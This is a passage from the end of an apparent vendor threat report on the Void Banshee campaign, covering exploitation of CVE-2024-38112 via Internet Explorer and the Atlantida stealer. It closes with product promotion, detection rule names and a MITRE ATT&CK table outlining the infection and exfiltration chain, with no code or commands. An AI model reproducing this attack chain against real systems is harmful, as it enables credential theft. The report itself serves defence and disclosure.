Conclusion
As part of this campaign, we observed that even though users can no longer access IE, malicious actors can still leverage persistent Windows relics like IE on their machine to infect users and organizations with ransomware, backdoors, or as a proxy to run other malware strains. The ability of APT groups like Void Banshee to exploit disabled services like IE poses a significant threat to organizations around the world. Given that services like IE have a large attack surface and are no longer patched, this represents a serious security concern for Windows users. Additionally, the ability of malicious actors to access unsupported and disabled system services to bypass modern web sandboxes like IE mode for Microsoft Edge highlights a significant industry concern.
To make software more secure and protect customers from zero-day attacks, Trend ZDI works with security researchers and vendors to responsibly patch and disclose software vulnerabilities before APT groups can deploy them in attacks. The ZDI Threat Hunting Team also proactively hunts for zero-day attacks in the wild to protect the industry. The ZDI program is the largest vendor-neutral bug bounty program in the world, while disclosing vulnerabilities to vendors at a rate 2.5x higher.
Organizations can protect against these types of attacks with Trend Vision One™️, which enables security teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision One helps organizations prioritize and manage potential risks, including vulnerabilities. It considers critical factors such as the likelihood and impact of potential attacks and offers a range of prevention, detection, and response capabilities. All of this is supported by advanced threat research, intelligence, and AI, which help reduce the time it takes to detect, respond, and remediate issues. Ultimately, Vision One can help improve an organization’s overall security posture and effectiveness, including against zero-day attacks.
When faced with intrusions, uncertain behaviors, and routines, organizations should assume that their system is already compromised or hacked and work to immediately isolate affected data or toolchains. With a broader perspective and rapid response, organizations can remediate breaches and protect their remaining systems, especially with technologies like Trend Micro Endpoint Security and Trend Micro Network Security, as well as comprehensive security solutions like Trend Micro™ XDR, which can detect, analyze, and block malicious content in the modern threat landscape.
Protections against trends
The following protections exist to detect and protect Trend customers against CVE-2024-38112 (ZDI-CAN-24433) and Atlantida zero-day malware exfiltration attempts.
Trend Vision One model
- Microsoft Windows Remote Code Execution Vulnerability (ZDI-CAN-24433)
- Svchost runs Iexplorer
Trend Micro Cloud One – Network Security and Filters TippingPoint
- 44417 – ZDI-CAN-24433: Zero Day Initiative Vulnerability (Microsoft Windows)
- 44453 – Trojan.Win32.AtlantidaStealer.A execution detected (geographic information)
- 44454 – Trojan.Win32.AtlantidaStealer.A execution detected (data exfiltrated)
Trend Vision One Endpoint Security, Trend Cloud One – Workload and Endpoint Security, In-Depth Security IPS Rules and Vulnerability Protection
- 1012075 – Microsoft Windows Remote Code Execution Vulnerability via SMB (ZDI-CAN-24433)
- 1012074 – Microsoft Windows Remote Code Execution Vulnerability (ZDI-CAN-24433)
MITRE ATT&CK techniques
| Tactical | Technical | Context |
| Initial access | T1566.002 – Phishing: targeted phishing link | Victim downloads malicious zip archive |
| Execution | T1204.002 – User execution: malicious file | The victim executes an Internet shortcut file (.URL) that exploits the CVE-2024-38112 vulnerability |
| Defense evasion | T1218 – Execution of system binary proxy | MHTML and x-usc directive handler opens compromised site in Internet Explorer |
| Compromised infrastructure | T1584.004 – Compromised Infrastructure: Server | The victim is redirected to a compromised site which downloads a malicious HTML application (.HTA) |
| Execution | T1204.002 – User execution: malicious file | The victim opens an HTA file |
| Execution | T1059.005 – Command and script interpreter – VBScript | The HTA application runs VBScript |
| Defense evasion | T1027 – Obfuscated files or information | Obfuscated VBScript |
| Compromised infrastructure | T1584.004 – Compromised Infrastructure: Server | VBScript downloads malicious PowerShell script |
| Execution | T1059.001 – Command and scripting interpreter – PowerShell | The PowerShell script runs |
| Compromised infrastructure | T1584.004 – Compromised Infrastructure: Server | PowerShell script downloads malicious .NET loader |
| Defense evasion | T1027 – Obfuscated files or information | Obfuscated .NET Loader |
| Elevation of privileges | T1055 – Injection into the process | Atlantida uses process injection to gain persistence |
| Execution | T1218.009 – Execution of system binary proxy: Regsvcs/Regasm | Atlantida uses RegAsm.exe to execute malicious code |
| Collection | T1560.001 – Archive via utility | Atlantida encrypts data to exfiltrate it |
| Collection | T1005 – Local system data | Atlantida collects sensitive information on the local system |
| Collection | T1082 – System information discovery | Atlantida collects information about the victim’s hardware |
| Collection | T1555.003 – Credentials from password databases: Credentials from web browsers | Atlantida collects sensitive data from web browsers, including Chrome extension data |
| Collection | T1113 – Screenshot | Atlantida captures screenshots of victim machine |
| Exfiltration | T1041 – Exfiltration Over C&C Channel | Void Banshee exfiltrates stolen data to C&C server |
Indicators of Compromise (IOC)
Download the full list of CIOs here.